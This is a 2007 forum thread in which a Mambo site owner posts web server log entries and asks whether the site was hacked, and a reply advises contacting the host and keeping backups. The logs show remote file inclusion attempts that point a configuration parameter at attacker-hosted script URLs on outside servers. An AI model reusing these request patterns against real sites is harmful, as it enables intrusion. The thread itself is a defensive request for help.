Has my Site been hacked? Suspicious log entries... - Mambo

miau · November 13th, 2007, 01:03

Are this Log entries any proof that the Mambo installation has been hacked? There are so many of them... I seems to be an attempt to abuse the site, but how can i know if it succeeded?

Code:

zeus.freshwebhosts.com - - [12/Nov/2007:23:33:49 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 18541 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:19:40:15 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 16219 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:18:44:15 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 200 959 "-" "libwww-perl/5.803" 2147 loretto.at
wpc1127.amenworld.com - - [12/Nov/2007:07:03:49 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 4680 loretto.at
webhodi-isp.de - - [11/Nov/2007:06:52:46 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 200 955 "-" "libwww-perl/5.803" 26175 loretto.at
webhodi-isp.de - - [11/Nov/2007:06:52:46 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 200 955 "-" "libwww-perl/5.803" 22889 loretto.at
web1.doogen.com - - [12/Nov/2007:23:31:26 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://72.1.85.234/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 17664 loretto.at
web1.doogen.com - - [10/Nov/2007:17:41:34 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 200 1013 "-" "libwww-perl/5.803" 5897 loretto.at
vps598.inmotionhosting.com - - [12/Nov/2007:06:10:45 +0100] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.ctegp.com.br/modules/My_eGallery/safeon.txt?? HTTP/1.1" 200 1005 "-" "libwww-perl/5.808" 15285 loretto.at
vps598.inmotionhosting.com - - [11/Nov/2007:11:24:20 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ctegp.com.br/modules/My_eGallery/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 20319 loretto.at
static-ip-85-25-148-183.inaddr.intergenia.de - - [12/Nov/2007:01:05:18 +0100] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 318 "-" "libwww-perl/5.805" 16775 loretto.at
srv_200-61-15-115.solunet.com.ar - - [12/Nov/2007:00:18:58 +0100] "GET /?mosConfig_absolute_path=http://www.salcedo.com.do/visitas//id.txt? HTTP/1.1" 200 27519 "-" "libwww-perl/5.803" 11182 loretto.at
sherbak-69.colo2.kv.wnet.ua - - [12/Nov/2007:08:17:35 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://elc.ntin.edu.tw/4images/data/database/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" 24871 loretto.at
server198130.evanzo-server.de - - [12/Nov/2007:20:32:39 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://71.41.190.203/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.803" 9254 loretto.at
server1.idcnetbr.com - - [11/Nov/2007:16:14:29 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://asantecaravans.co.za/content/rss1/cmd.txt? HTTP/1.1" 404 319 "-" "libwww-perl/5.808" 28490 loretto.at
tiger.phpweb.biz - - [11/Nov/2007:13:23:26 +0100] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hgbruce.com/components/com_rsgallery/safeon.txt?? HTTP/1.1" 404 319 "-" "libwww-perl/5.805" 5506 loretto.at

and much more...

I would appreciate your oppinion, as dealing with logfiles and hackers is quite new to me.

Michael

Tengu · November 13th, 2007, 06:26

Better to ask your host ... doesn't look good though. Tell your host what version you are running too. And mak sure you keep on tight to your backup

miau · November 14th, 2007, 05:42

i will ask the ISP ... and continuing with the backups ...

November 13th, 2007, 06:26	#2
Tengu Join Date: Dec 2006 Posts: 502	Better to ask your host ... doesn't look good though. Tell your host what version you are running too. And mak sure you keep on tight to your backup __________________ Tengu webDesign: www.tengu.nl Official Mambo Support Forum:forum.mambo-foundation.org/

November 14th, 2007, 05:42	#3
miau Join Date: Sep 2004 Location: Vienna Posts: 22	Thanks, i will ask the ISP ... and continuing with the backups ...

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
UPSU.net - very hacked Mambo site - all opinions wanted! :o)	deckmunki	Sites using Mambo	1	November 28th, 2006 11:54
site is hacked	rrrifff	Security & Performance	0	September 13th, 2006 09:16
Someone hacked my site...	qtip	Security & Performance	4	June 9th, 2006 23:33
My site hacked propbably	serkoli	Security & Performance	2	February 4th, 2006 11:40
can't see site but can log in to admin	xgipper	General Questions	1	January 16th, 2006 01:34